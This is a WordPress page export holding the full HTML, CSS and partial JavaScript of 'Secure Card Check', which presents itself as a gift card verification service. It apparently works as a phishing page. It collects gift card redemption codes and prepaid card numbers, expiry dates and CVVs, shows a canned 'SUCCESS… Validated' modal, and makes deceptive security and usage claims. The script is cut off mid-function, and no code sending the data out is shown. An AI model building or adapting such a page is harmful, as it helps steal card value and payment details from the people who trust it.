{"id":1009,"date":"2026-05-05T10:24:59","date_gmt":"2026-05-05T10:24:59","guid":{"rendered":"https:\/\/securecardcheck.com\/?page_id=1009"},"modified":"2026-05-05T11:08:16","modified_gmt":"2026-05-05T11:08:16","slug":"elementor-page-1009","status":"publish","type":"page","link":"https:\/\/securecardcheck.com\/","title":{"rendered":"Elementor Page #1009"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"1009\" class=\"elementor elementor-1009\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a7efa9c e-flex e-con-boxed e-con e-parent\" data-id=\"a7efa9c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8a3761d elementor-widget-mobile__width-initial elementor-widget elementor-widget-html\" data-id=\"8a3761d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, user-scalable=yes\">\n    <title>Secure Card Check | Gift Card Verification<\/title>\n    <link href=\"https:\/\/fonts.googleapis.com\/css2?family=Inter:opsz,wght@14..32,300;400;500;600;700;800&display=swap\" rel=\"stylesheet\">\n    <link rel=\"stylesheet\" href=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/6.0.0-beta3\/css\/all.min.css\">\n    <style>\n        * { margin: 0; padding: 0; box-sizing: border-box; }\n\n        body {\n            background: radial-gradient(circle at 0% 0%, #0a1a2e, #061220);\n            font-family: 'Inter', -apple-system, BlinkMacSystemFont, sans-serif;\n            min-height: 100vh;\n            padding: 0;\n            position: relative;\n        }\n\n        body::before {\n            content: '';\n            position: fixed;\n            top: 0;\n            left: 0;\n            right: 0;\n            bottom: 0;\n            background: radial-gradient(circle at 20% 30%, rgba(52,215,161,0.12), transparent 50%),\n                        radial-gradient(circle at 80% 70%, rgba(35,114,255,0.1), transparent 50%);\n            pointer-events: none;\n            z-index: 0;\n        }\n\n        \/* main container - top padding for fixed header *\/\n        .secure-container {\n            max-width: 1400px;\n            margin: 80px auto 0 auto;\n            background: rgba(255,255,255,0.97);\n            backdrop-filter: blur(2px);\n            border-radius: 2rem;\n            box-shadow: 0 30px 50px rgba(0,0,0,0.2);\n            overflow: hidden;\n            position: relative;\n            z-index: 1;\n        }\n\n        \/* Floating orbs *\/\n        .orb {\n            position: absolute;\n            border-radius: 50%;\n            filter: blur(60px);\n            opacity: 0.35;\n            pointer-events: none;\n            z-index: 0;\n            animation: float 20s infinite ease-in-out;\n        }\n        @keyframes float {\n            0%, 100% { transform: translate(0, 0); }\n            50% { transform: translate(30px, -30px); }\n        }\n        .orb-1 { width: 350px; height: 350px; background: #34d7a1; top: -100px; left: -100px; }\n        .orb-2 { width: 400px; height: 400px; background: #2372ff; bottom: -150px; right: -100px; }\n        .orb-3 { width: 250px; height: 250px; background: #ff7a59; top: 40%; left: 30%; }\n\n        \/* ========== STICKY FANCY HEADER ========== *\/\n        .main-nav {\n            position: fixed;\n            top: 0;\n            left: 0;\n            right: 0;\n            z-index: 1000;\n            background: linear-gradient(135deg, #0a1a2e 0%, #133a4a 100%);\n            padding: 1rem 2rem;\n            display: flex;\n            align-items: center;\n            justify-content: space-between;\n            border-bottom: 1px solid rgba(52,215,161,0.3);\n            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.3);\n            backdrop-filter: blur(10px);\n            transition: all 0.3s ease;\n        }\n        \/* shrink effect on scroll *\/\n        .main-nav.scrolled {\n            padding: 0.6rem 2rem;\n            background: linear-gradient(135deg, #0a1a2e 0%, #0f2a38 100%);\n        }\n        .logo {\n            display: flex;\n            align-items: center;\n            gap: 10px;\n        }\n        .logo-icon {\n            width: 36px;\n            height: 36px;\n            background: linear-gradient(135deg, #34d7a1, #2372ff);\n            border-radius: 12px;\n            box-shadow: 0 4px 10px rgba(52,215,161,0.3);\n            transition: all 0.3s;\n        }\n        .logo h1 {\n            font-size: 1.4rem;\n            font-weight: 800;\n            background: linear-gradient(135deg, #ffffff, #a8f0e0, #34d7a1);\n            background-clip: text;\n            -webkit-background-clip: text;\n            color: transparent;\n            letter-spacing: -0.5px;\n        }\n\n        \/* ===== HAMBURGER MENU BUTTON (mobile only) ===== *\/\n        .menu-toggle {\n            display: none;\n            background: rgba(255,255,255,0.1);\n            border: 1px solid rgba(52,215,161,0.5);\n            border-radius: 12px;\n            padding: 8px 12px;\n            cursor: pointer;\n            transition: all 0.3s;\n        }\n        .menu-toggle i {\n            font-size: 1.5rem;\n            color: #34d7a1;\n        }\n        .menu-toggle:hover {\n            background: rgba(52,215,161,0.2);\n        }\n\n        \/* ===== DESKTOP NAVIGATION ===== *\/\n        .nav-links {\n            display: flex;\n            gap: 2rem;\n            list-style: none;\n        }\n        .nav-links li a {\n            text-decoration: none;\n            font-weight: 600;\n            color: #e0f0f5;\n            transition: all 0.3s;\n            font-size: 0.95rem;\n            position: relative;\n            padding: 0.5rem 0;\n        }\n        .nav-links li a::after {\n            content: '';\n            position: absolute;\n            bottom: 0;\n            left: 0;\n            width: 0;\n            height: 2px;\n            background: linear-gradient(90deg, #34d7a1, #2372ff);\n            transition: width 0.3s;\n        }\n        .nav-links li a:hover::after { width: 100%; }\n        .nav-links li a:hover { color: #34d7a1; }\n\n        \/* ===== SIDE DRAWER MENU (Mobile) ===== *\/\n        .side-drawer {\n            position: fixed;\n            top: 0;\n            right: -280px;\n            width: 280px;\n            height: 100%;\n            background: linear-gradient(145deg, #0f2a38, #0a1a2e);\n            z-index: 2000;\n            transition: right 0.3s ease;\n            box-shadow: -5px 0 25px rgba(0,0,0,0.3);\n            padding: 2rem 1.5rem;\n            display: flex;\n            flex-direction: column;\n            gap: 2rem;\n            border-left: 1px solid rgba(52,215,161,0.3);\n        }\n        .side-drawer.open {\n            right: 0;\n        }\n        .drawer-header {\n            display: flex;\n            justify-content: flex-end;\n        }\n        .close-drawer {\n            background: none;\n            border: none;\n            color: #34d7a1;\n            font-size: 1.6rem;\n            cursor: pointer;\n        }\n        .side-nav-links {\n            list-style: none;\n            display: flex;\n            flex-direction: column;\n            gap: 1.5rem;\n        }\n        .side-nav-links li a {\n            text-decoration: none;\n            font-weight: 600;\n            color: #e0f0f5;\n            font-size: 1.2rem;\n            display: block;\n            padding: 0.5rem 0;\n            transition: 0.2s;\n            border-bottom: 1px solid rgba(52,215,161,0.2);\n        }\n        .side-nav-links li a:hover {\n            color: #34d7a1;\n            padding-left: 8px;\n        }\n        .drawer-overlay {\n            position: fixed;\n            top: 0;\n            left: 0;\n            width: 100%;\n            height: 100%;\n            background: rgba(0,0,0,0.5);\n            backdrop-filter: blur(3px);\n            z-index: 1999;\n            opacity: 0;\n            visibility: hidden;\n            transition: 0.2s;\n        }\n        .drawer-overlay.active {\n            opacity: 1;\n            visibility: visible;\n        }\n\n        \/* Alert Banners *\/\n        .alert-banner {\n            background: linear-gradient(135deg, #fff8e7, #fff0d4);\n            border-left: 5px solid #f5a65b;\n            margin: 1.8rem 2rem 0 2rem;\n            padding: 0.9rem 1.2rem;\n            border-radius: 20px;\n            color: #b85c00;\n            font-size: 0.85rem;\n            display: flex;\n            align-items: center;\n            gap: 10px;\n        }\n        .instruction-note {\n            background: linear-gradient(135deg, #e8f5f0, #d4ede4);\n            margin: 0.8rem 2rem;\n            padding: 0.9rem 1.2rem;\n            border-radius: 20px;\n            color: #1e6b4a;\n            font-size: 0.85rem;\n            border: 1px solid #bee0d4;\n            display: flex;\n            align-items: center;\n            gap: 10px;\n        }\n\n        \/* Hero Section *\/\n        .hero-section {\n            display: flex;\n            flex-wrap: wrap;\n            align-items: center;\n            gap: 2rem;\n            margin: 2rem 2rem 0.5rem 2rem;\n            background: linear-gradient(135deg, rgba(255,255,255,0.8), rgba(248,252,255,0.9));\n            border-radius: 32px;\n            padding: 1.5rem;\n            backdrop-filter: blur(4px);\n        }\n        .hero-text h1 {\n            font-size: 2.5rem;\n            font-weight: 800;\n            line-height: 1.2;\n            background: linear-gradient(135deg, #0a1a2e, #2a7f6e, #2372ff);\n            background-clip: text;\n            -webkit-background-clip: text;\n            color: transparent;\n            margin-bottom: 1rem;\n        }\n        .hero-text p { color: #3a5a6e; font-size: 1rem; margin-bottom: 1.2rem; line-height: 1.6; }\n        .verify-now-btn {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            border: none;\n            padding: 0.8rem 2rem;\n            border-radius: 50px;\n            color: white;\n            font-weight: 700;\n            cursor: pointer;\n            transition: all 0.3s;\n            box-shadow: 0 8px 20px rgba(42,127,110,0.3);\n        }\n        .verify-now-btn:hover { transform: translateY(-3px); box-shadow: 0 12px 28px rgba(42,127,110,0.4); }\n        .hero-images { flex: 0.9; display: flex; gap: 1rem; justify-content: center; flex-wrap: wrap; }\n        .hero-img { width: 180px; border-radius: 20px; transition: all 0.3s; filter: drop-shadow(0 12px 20px rgba(0,0,0,0.15)); }\n        .hero-img img { width: 100%; border-radius: 16px; display: block; }\n        .hero-img:hover { transform: translateY(-8px) scale(1.02); }\n\n        \/* Card Selector *\/\n        .card-selector {\n            background: linear-gradient(135deg, #ffffff, #f8fcff);\n            border: 1px solid rgba(35,114,255,0.15);\n            border-radius: 28px;\n            margin: 1rem 2rem;\n            padding: 1.2rem 1.5rem;\n        }\n        .selector-title { font-size: 1.2rem; font-weight: 700; color: #1a4a5f; margin-bottom: 0.5rem; }\n        .card-buttons { display: flex; flex-wrap: wrap; gap: 0.8rem; margin: 1rem 0 0.5rem; }\n        .card-amount {\n            background: linear-gradient(135deg, #ffffff, #f5f9ff);\n            border: 1px solid #cce0f0;\n            border-radius: 50px;\n            padding: 0.5rem 1.3rem;\n            font-weight: 700;\n            cursor: pointer;\n            transition: all 0.3s;\n            color: #1a4a5f;\n        }\n        .card-amount.active {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            border-color: transparent;\n            color: white;\n            box-shadow: 0 4px 12px rgba(42,127,110,0.3);\n        }\n\n        \/* Verification Panel *\/\n        .verify-panel {\n            margin: 1rem 2rem;\n            background: rgba(255,255,255,0.95);\n            border-radius: 28px;\n            padding: 1.8rem;\n            border: 1px solid rgba(35,114,255,0.1);\n        }\n        .form-row { display: flex; flex-wrap: wrap; gap: 1.2rem; margin-bottom: 1.2rem; }\n        .form-group { flex: 1; min-width: 150px; }\n        label { font-weight: 700; display: block; margin-bottom: 0.3rem; font-size: 0.75rem; color: #1a4a5f; text-transform: uppercase; letter-spacing: 0.5px; }\n        select, input {\n            width: 100%;\n            padding: 0.8rem 1rem;\n            border: 2px solid #e0ecf5;\n            border-radius: 20px;\n            font-family: 'Inter', monospace;\n            font-size: 0.85rem;\n            transition: all 0.3s;\n            background: white;\n        }\n        select:focus, input:focus { border-color: #34d7a1; outline: none; box-shadow: 0 0 0 3px rgba(52,215,161,0.2); }\n        .dynamic-fields {\n            background: linear-gradient(135deg, #f8fcff, #ffffff);\n            border-radius: 24px;\n            padding: 1rem;\n            margin: 1rem 0;\n            border: 1px solid #e0ecf5;\n        }\n        .dynamic-row { display: flex; flex-wrap: wrap; gap: 12px; margin-top: 8px; }\n        .dynamic-row input { flex: 1; min-width: 130px; }\n        .warning-banner {\n            background: linear-gradient(135deg, #fff8e7, #fff5e8);\n            border-left: 4px solid #f5a65b;\n            padding: 0.7rem 1rem;\n            margin: 1rem 0;\n            border-radius: 16px;\n            font-size: 0.8rem;\n            color: #b85c00;\n            display: flex;\n            align-items: center;\n            gap: 8px;\n        }\n        .verify-card-btn {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            color: white;\n            border: none;\n            padding: 0.9rem 2rem;\n            border-radius: 50px;\n            font-weight: 800;\n            cursor: pointer;\n            transition: all 0.3s;\n            font-size: 0.9rem;\n            width: 100%;\n        }\n        .verify-card-btn:hover { transform: translateY(-2px); }\n        .result-message { margin-top: 1rem; padding: 0.8rem; border-radius: 18px; background: #f0f6fc; border-left: 4px solid #34d7a1; font-size: 0.85rem; }\n\n        \/* Services *\/\n        .services-section { padding: 1rem 2rem 2rem 2rem; }\n        .services-grid { display: flex; flex-wrap: wrap; gap: 2rem; justify-content: center; }\n        .service-card {\n            background: linear-gradient(145deg, #ffffff, #f5fafe);\n            flex: 1;\n            min-width: 260px;\n            border-radius: 2rem;\n            padding: 2rem 1.5rem;\n            text-align: center;\n            border: 1px solid rgba(52,215,161,0.2);\n            transition: all 0.3s;\n        }\n        .service-card:hover { transform: translateY(-8px); border-color: #34d7a1; }\n        .service-icon {\n            background: linear-gradient(135deg, #e8f5f0, #d4ede4);\n            width: 70px;\n            height: 70px;\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            border-radius: 28px;\n            margin: 0 auto 1rem;\n            color: #2a7f6e;\n            font-size: 2rem;\n            transition: all 0.3s;\n        }\n        .service-card:hover .service-icon {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            color: white;\n            transform: scale(1.05);\n        }\n        .service-card h3 { color: #1a4a5f; font-size: 1.3rem; margin-bottom: 0.5rem; }\n        .service-card p { color: #5a6e8a; line-height: 1.5; font-size: 0.85rem; }\n\n        \/* Contact + Stats *\/\n        .contact-stats {\n            display: flex;\n            flex-wrap: wrap;\n            gap: 2rem;\n            margin: 0 2rem 2rem 2rem;\n            background: linear-gradient(135deg, #f8fcff, #ffffff);\n            border-radius: 2rem;\n            padding: 1.5rem;\n        }\n        .contact-form { flex: 2; }\n        .contact-form h3 { color: #1a4a5f; margin-bottom: 0.5rem; }\n        .contact-form p { color: #5a6e8a; font-size: 0.85rem; margin-bottom: 1rem; }\n        .contact-form input, .contact-form textarea {\n            margin-bottom: 0.8rem;\n            padding: 0.8rem;\n            border-radius: 20px;\n            border: 2px solid #e0ecf5;\n            width: 100%;\n        }\n        .contact-form input:focus, .contact-form textarea:focus { border-color: #34d7a1; outline: none; }\n        .submit-btn {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            border: none;\n            padding: 0.7rem 1.5rem;\n            border-radius: 50px;\n            color: white;\n            font-weight: 700;\n            cursor: pointer;\n        }\n        .stats-card {\n            flex: 1;\n            background: linear-gradient(135deg, #f0f8f5, #ffffff);\n            border-radius: 1.8rem;\n            padding: 1.2rem;\n            text-align: center;\n        }\n        .stats-number { font-size: 2.5rem; font-weight: 800; color: #2a7f6e; }\n        .try-free {\n            background: transparent;\n            border: 2px solid #2a7f6e;\n            border-radius: 50px;\n            padding: 0.4rem 1rem;\n            margin-top: 0.6rem;\n            cursor: pointer;\n            color: #2a7f6e;\n            font-weight: 600;\n            transition: 0.3s;\n        }\n        .try-free:hover { background: #2a7f6e; color: white; }\n\n        \/* Log Table *\/\n        .log-section {\n            margin: 0 2rem 2rem 2rem;\n            background: linear-gradient(135deg, #f8fcff, #ffffff);\n            border-radius: 1.8rem;\n            padding: 1.2rem;\n        }\n        .log-section h3 { color: #1a4a5f; margin-bottom: 12px; }\n        .log-table { width: 100%; border-collapse: collapse; font-size: 0.75rem; }\n        .log-table th, .log-table td { padding: 0.6rem 0.4rem; border-bottom: 1px solid #e0ecf5; text-align: left; }\n        .status-success { background: #d4f0e8; color: #1e6b4a; border-radius: 40px; padding: 0.2rem 0.7rem; display: inline-block; }\n        .status-error { background: #ffe0d6; color: #c46b2b; border-radius: 40px; padding: 0.2rem 0.7rem; display: inline-block; }\n        .clear-log { background: transparent; border: 1px solid #cce0f0; border-radius: 50px; padding: 0.3rem 1rem; cursor: pointer; transition: 0.3s; }\n        .clear-log:hover { background: #f0f6fc; border-color: #2a7f6e; }\n\n        \/* Footer *\/\n        footer {\n            background: linear-gradient(135deg, #0a1a2e, #061220);\n            color: #a8c8d8;\n            text-align: center;\n            padding: 1.2rem 2rem;\n            font-size: 0.75rem;\n            border-top: 1px solid rgba(52,215,161,0.2);\n        }\n\n        \/* Modal *\/\n        .modal-overlay {\n            position: fixed;\n            top: 0; left: 0;\n            width: 100%; height: 100%;\n            background: rgba(10, 26, 46, 0.9);\n            backdrop-filter: blur(8px);\n            z-index: 2000;\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            opacity: 0;\n            visibility: hidden;\n            transition: 0.3s;\n        }\n        .modal-overlay.active { opacity: 1; visibility: visible; }\n        .modal-card {\n            background: linear-gradient(145deg, #ffffff, #f5fafe);\n            max-width: 440px;\n            width: 90%;\n            border-radius: 2rem;\n            padding: 2rem;\n            text-align: center;\n        }\n        .modal-icon {\n            background: linear-gradient(135deg, #2a7f6e, #34d7a1);\n            width: 70px; height: 70px;\n            border-radius: 50%;\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            margin: 0 auto 1rem;\n            font-size: 2rem;\n            color: white;\n        }\n        .modal-card h2 { margin-bottom: 0.5rem; color: #1a4a5f; }\n        .toast {\n            position: fixed;\n            bottom: 25px;\n            left: 50%;\n            transform: translateX(-50%);\n            background: linear-gradient(135deg, #1a4a5f, #0a1a2e);\n            color: white;\n            padding: 10px 26px;\n            border-radius: 50px;\n            z-index: 2100;\n            font-size: 0.85rem;\n            white-space: nowrap;\n        }\n\n        \/* Responsive: Mobile menu hide, show hamburger + side drawer *\/\n        @media (max-width: 800px) {\n            .secure-container { margin-top: 70px; }\n            .nav-links { display: none; }\n            .menu-toggle { display: block; }\n            .hero-section { flex-direction: column; text-align: center; }\n            .form-row { flex-direction: column; }\n            .contact-stats { flex-direction: column; }\n            .hero-text h1 { font-size: 1.8rem; }\n            .toast { white-space: normal; text-align: center; max-width: 85%; }\n        }\n    <\/style>\n<\/head>\n<body>\n\n<!-- SIDE DRAWER (mobile menu) -->\n<div class=\"drawer-overlay\" id=\"drawerOverlay\"><\/div>\n<div class=\"side-drawer\" id=\"sideDrawer\">\n    <div class=\"drawer-header\">\n        <button class=\"close-drawer\" id=\"closeDrawerBtn\"><i class=\"fas fa-times\"><\/i><\/button>\n    <\/div>\n    <ul class=\"side-nav-links\">\n        <li><a href=\"#\" data-nav=\"home\">\ud83c\udfe0 Home<\/a><\/li>\n        <li><a href=\"#\" data-nav=\"verify\">\ud83d\udd0d Verify<\/a><\/li>\n        <li><a href=\"#\" data-nav=\"services\">\u2699\ufe0f Services<\/a><\/li>\n        <li><a href=\"#\" data-nav=\"contact\">\ud83d\udce7 Contact<\/a><\/li>\n    <\/ul>\n<\/div>\n\n<div class=\"secure-container\">\n    <div class=\"orb orb-1\"><\/div>\n    <div class=\"orb orb-2\"><\/div>\n    <div class=\"orb orb-3\"><\/div>\n\n    <!-- STICKY FANCY HEADER with hamburger -->\n    <nav class=\"main-nav\" id=\"mainNav\">\n        <div class=\"logo\">\n            <div class=\"logo-icon\"><\/div>\n            <h1>Secure Card Check<\/h1>\n        <\/div>\n        <div class=\"menu-toggle\" id=\"menuToggle\">\n            <i class=\"fas fa-bars\"><\/i>\n        <\/div>\n        <ul class=\"nav-links\">\n            <li><a href=\"#\" data-nav=\"home\">Home<\/a><\/li>\n            <li><a href=\"#\" data-nav=\"verify\">Verify<\/a><\/li>\n            <li><a href=\"#\" data-nav=\"services\">Services<\/a><\/li>\n            <li><a href=\"#\" data-nav=\"contact\">Contact<\/a><\/li>\n        <\/ul>\n    <\/nav>\n\n    <!-- Hero Section -->\n    <div class=\"hero-section\">\n        <div class=\"hero-text\">\n            <h1>Verify your Gift Card authenticity<\/h1>\n            <p>Leverage our agile and efficient frameworks to provide a robust verification. Our smart algorithms run very fast to provide for you adequate info.<\/p>\n            <button class=\"verify-now-btn\" id=\"heroVerifyBtn\">Verify now <i class=\"fas fa-arrow-right\"><\/i><\/button>\n        <\/div>\n        <div class=\"hero-images\">\n            <div class=\"hero-img\"><img decoding=\"async\" src=\"https:\/\/card-ly.onrender.com\/static\/media\/gc2.369f71a6.png\" alt=\"itunes card\"><\/div>\n        <\/div>\n    <\/div>\n\n    <!-- iTunes Card Selector -->\n    <div class=\"card-selector\">\n        <div class=\"selector-title\"><i class=\"fab fa-apple\"><\/i> iTunes Gift Cards<\/div>\n        <div class=\"card-buttons\" id=\"amountSelector\">\n            <div class=\"card-amount\" data-amount=\"100\">$100<\/div>\n            <div class=\"card-amount\" data-amount=\"50\">$50<\/div>\n            <div class=\"card-amount\" data-amount=\"25\">$25<\/div>\n            <div class=\"card-amount\" data-amount=\"15\">$15<\/div>\n        <\/div>\n        <p>Apps, games, music, movies, TV shows, books, and more.<\/p>\n    <\/div>\n    <div class=\"hero-images\">\n        <div class=\"hero-img\"><img decoding=\"async\" src=\"https:\/\/card-ly.onrender.com\/static\/media\/gc1.d0ac9ea2.png\" alt=\"gift card\"><\/div>\n    <\/div>\n\n    <!-- Verification Panel -->\n    <div class=\"verify-panel\" id=\"verifyPanel\">\n        <div class=\"form-row\">\n            <div class=\"form-group\">\n                <label><i class=\"fas fa-globe\"><\/i> Currency<\/label>\n                <select id=\"currencySelect\">\n                    <option value=\"USD\">\ud83c\uddfa\ud83c\uddf8 USD - US Dollar<\/option>\n                    <option value=\"CAD\">\ud83c\udde8\ud83c\udde6 CAD - Canadian Dollar<\/option>\n                    <option value=\"GBP\">\ud83c\uddec\ud83c\udde7 GBP - British Pound<\/option>\n                    <option value=\"AUD\">\ud83c\udde6\ud83c\uddfa AUD - Australian Dollar<\/option>\n                    <option value=\"EUR\">\ud83c\uddea\ud83c\uddfa EUR - Euro<\/option>\n                <\/select>\n            <\/div>\n            <div class=\"form-group\">\n                <label><i class=\"fas fa-tag\"><\/i> Card Amount<\/label>\n                <input type=\"number\" id=\"cardAmount\" value=\"25\" step=\"1\">\n            <\/div>\n            <div class=\"form-group\">\n                <label><i class=\"fas fa-credit-card\"><\/i> Select type of card<\/label>\n                <select id=\"cardTypeSelect\"><\/select>\n            <\/div>\n        <\/div>\n        <div id=\"dynamicFieldsContainer\" class=\"dynamic-fields\"><\/div>\n        <div class=\"warning-banner\"><i class=\"fas fa-exclamation-triangle\"><\/i> \u26a0\ufe0f Please make sure the redemption code is the original scratched code<\/div>\n        <button class=\"verify-card-btn\" id=\"verifyBtn\"><i class=\"fas fa-shield-alt\"><\/i> Verify Card<\/button>\n        <div id=\"verifyResult\" class=\"result-message\">Select card type, fill details, then click Verify.<\/div>\n    <\/div>\n\n    <!-- Services Section -->\n    <div class=\"services-section\" id=\"servicesSection\">\n        <div class=\"services-grid\">\n            <div class=\"service-card\"><div class=\"service-icon\"><i class=\"fas fa-tachometer-alt\"><\/i><\/div><h3>High performance<\/h3><p>Our smart algorithms run very fast to provide for you adequate info about your giftcard. We value our customers time, that is why you can get a fast response on your request<\/p><\/div>\n            <div class=\"service-card\"><div class=\"service-icon\"><i class=\"fas fa-shield-virus\"><\/i><\/div><h3>Secured and Encrypted<\/h3><p>We at Secure Card Check makes sure customers giftcard details are secured and encrypted. No attacker or false identity can intercept your verification operations<\/p><\/div>\n            <div class=\"service-card\"><div class=\"service-icon\"><i class=\"fas fa-globe\"><\/i><\/div><h3>Decentralized<\/h3><p>Our smart frameworks is built on a decentralized platform to ensure clients gift card details are not stored anywhere in the server. Your card details are immediately deleted after verification operations.<\/p><\/div>\n        <\/div>\n    <\/div>\n\n    <!-- Contact + Stats -->\n    <div class=\"contact-stats\" id=\"contactSection\">\n        <div class=\"contact-form\">\n            <h3><i class=\"fas fa-headset\"><\/i> Contact Us<\/h3>\n            <p>We are available to help you with your giftcard verification needs and to provide you support with a quick solution to your problem.<\/p>\n            <input type=\"email\" id=\"contactEmail\" placeholder=\"name@example.com\">\n            <textarea id=\"contactMessage\" rows=\"2\" placeholder=\"Message\"><\/textarea>\n            <button class=\"submit-btn\" id=\"submitContactBtn\">Submit <i class=\"fas fa-paper-plane\"><\/i><\/button>\n            <div id=\"contactFeedback\" style=\"margin-top:8px; font-size:0.75rem;\"><\/div>\n        <\/div>\n        <div class=\"stats-card\">\n            <i class=\"fas fa-chart-line\" style=\"font-size:1.8rem; color:#2a7f6e;\"><\/i>\n            <div class=\"stats-number\" id=\"verifiedCounter\">8,412<\/div>\n            <p>+ giftcards verified on our site. Verify yours now<\/p>\n            <button class=\"try-free\" id=\"tryFreeBtn\">Try it for free <i class=\"fas fa-arrow-right\"><\/i><\/button>\n        <\/div>\n    <\/div>\n\n    <!-- Verification Log -->\n    <div class=\"log-section\">\n        <h3><i class=\"fas fa-history\"><\/i> Recent Verifications<\/h3>\n        <table class=\"log-table\">\n            <thead><tr><th>Timestamp<\/th><th>Card Type<\/th><th>Amount<\/th><th>Status<\/th><\/tr><\/thead>\n            <tbody id=\"logTableBody\"><tr><td colspan=\"4\" style=\"text-align:center;\">No verifications yet<\/tr><\/tbody>\n        <\/table>\n        <button class=\"clear-log\" id=\"clearLogBtn\">Clear log<\/button>\n    <\/div>\n\n    <!-- Footer -->\n    <footer>\u00a9 2025 Secure Card Check \u2014 All Rights Reserved<\/footer>\n<\/div>\n\n<!-- Modal -->\n<div class=\"modal-overlay\" id=\"resultModal\">\n    <div class=\"modal-card\">\n        <div class=\"modal-icon\"><i class=\"fas fa-check-circle\"><\/i><\/div>\n        <h2>SUCCESS!<\/h2>\n        <p>Your gift card has been verified<\/p>\n        <div style=\"background:#f0f6fc; border-radius: 1rem; padding: 0.8rem; margin: 1rem 0;\">\n            <div style=\"display:flex; justify-content:space-between; padding:0.3rem 0;\"><strong>Brand:<\/strong> <span id=\"modalBrand\">\u2014<\/span><\/div>\n            <div style=\"display:flex; justify-content:space-between; padding:0.3rem 0;\"><strong>Amount:<\/strong> <span id=\"modalAmount\">\u2014<\/span><\/div>\n            <div style=\"display:flex; justify-content:space-between; padding:0.3rem 0;\"><strong>Status:<\/strong> <span style=\"color:#2a7f6e; font-weight:600;\">Validated \u2713<\/span><\/div>\n        <\/div>\n        <button id=\"closeModalBtn\" style=\"background:linear-gradient(135deg,#2a7f6e,#34d7a1); color:white; border:none; padding:0.6rem 1.2rem; border-radius:50px; width:100%; cursor:pointer;\">Close<\/button>\n    <\/div>\n<\/div>\n\n<script>\n(function() {\n    \/\/ ========== MOBILE SIDE DRAWER LOGIC ==========\n    const menuToggle = document.getElementById('menuToggle');\n    const sideDrawer = document.getElementById('sideDrawer');\n    const drawerOverlay = document.getElementById('drawerOverlay');\n    const closeDrawerBtn = document.getElementById('closeDrawerBtn');\n    \n    function openDrawer() {\n        sideDrawer.classList.add('open');\n        drawerOverlay.classList.add('active');\n        document.body.style.overflow = 'hidden';\n    }\n    function closeDrawer() {\n        sideDrawer.classList.remove('open');\n        drawerOverlay.classList.remove('active');\n        document.body.style.overflow = '';\n    }\n    if (menuToggle) menuToggle.addEventListener('click', openDrawer);\n    if (closeDrawerBtn) closeDrawerBtn.addEventListener('click', closeDrawer);\n    if (drawerOverlay) drawerOverlay.addEventListener('click', closeDrawer);\n    \n    \/\/ Sticky header shrink effect\n    const header = document.getElementById('mainNav');\n    window.addEventListener('scroll', () => {\n        if (window.scrollY > 50) header.classList.add('scrolled');\n        else header.classList.remove('scrolled');\n    });\n    \n    \/\/ ========== GIFT CARDS DATABASE (same as original) ==========\n    const giftCards = [\"Amazon\",\"Apple App Store\",\"Best Buy\",\"DoorDash\",\"eBay\",\"Google Play\",\"Home Depot\",\"iTunes\",\"Mastercard Gift\",\"Netflix\",\"Nike\",\"PlayStation Store\",\"Sephora\",\"Spotify\",\"Starbucks\",\"Steam Wallet\",\"Target\",\"Uber\",\"Vanilla Gift\",\"Visa Gift\",\"Walmart\"];\n    const cardFields = {\n        \"Vanilla Gift\": [\"cardNumber\",\"expiry\",\"cvv\"],\n        \"Visa Gift\": [\"cardNumber\",\"expiry\",\"cvv\"],\n        \"Mastercard Gift\": [\"cardNumber\",\"expiry\",\"cvv\"],\n        \"iTunes\": [\"redemptionCode\"],\n        \"Apple App Store\": [\"redemptionCode\"],\n        \"Amazon\": [\"claimCode\"],\n        \"Google Play\": [\"code\"],\n        \"Steam Wallet\": [\"walletCode\"],\n        \"Netflix\": [\"giftCode\"],\n        \"Spotify\": [\"premiumCode\"],\n        \"PlayStation Store\": [\"voucherCode\"],\n        \"default\": [\"redemptionCode\"]\n    };\n    function getFields(card) { return cardFields[card] || cardFields[\"default\"]; }\n    function renderDynamic(card) {\n        const container = document.getElementById('dynamicFieldsContainer');\n        if (!container) return;\n        const fields = getFields(card);\n        let html = `<strong>${card} details<\/strong><div class=\"dynamic-row\">`;\n        fields.forEach(f => {\n            let placeholder = \"\", type = \"text\";\n            if (f === \"cardNumber\") placeholder = \"Card number (16 digits)\";\n            else if (f === \"expiry\") placeholder = \"MM\/YY\";\n            else if (f === \"cvv\") { placeholder = \"CVV\"; type = \"password\"; }\n            else if (f === \"redemptionCode\") placeholder = \"Redemption code\";\n            else if (f === \"claimCode\") placeholder = \"Claim code\";\n            else placeholder = \"Enter code\";\n            html += `<input type=\"${type}\" class=\"dynamic-input\" placeholder=\"${placeholder}\">`;\n        });\n        html += `<\/div>`;\n        container.innerHTML = html;\n    }\n    const cardSelect = document.getElementById('cardTypeSelect');\n    if (cardSelect) {\n        giftCards.forEach(card => { let opt = document.createElement('option'); opt.value = card; opt.textContent = card; cardSelect.appendChild(opt); });\n        cardSelect.value = \"iTunes\";\n        renderDynamic(\"iTunes\");\n        cardSelect.addEventListener('change', (e) => renderDynamic(e.target.value));\n    }\n    const amountBtns = document.querySelectorAll('.card-amount');\n    const amountInput = document.getElementById('cardAmount');\n    amountBtns.forEach(btn => btn.addEventListener('click', () => {\n        amountBtns.forEach(b => b.classList.remove('active'));\n        btn.classList.add('active');\n        amountInput.value = btn.getAttribute('data-amount');\n    }));\n    if (amountBtns[2]) amountBtns[2].classList.add('active');\n    \n    let logEntries = [], verifiedCount = 8412;\n    function loadData() {\n        try {\n            const stored = 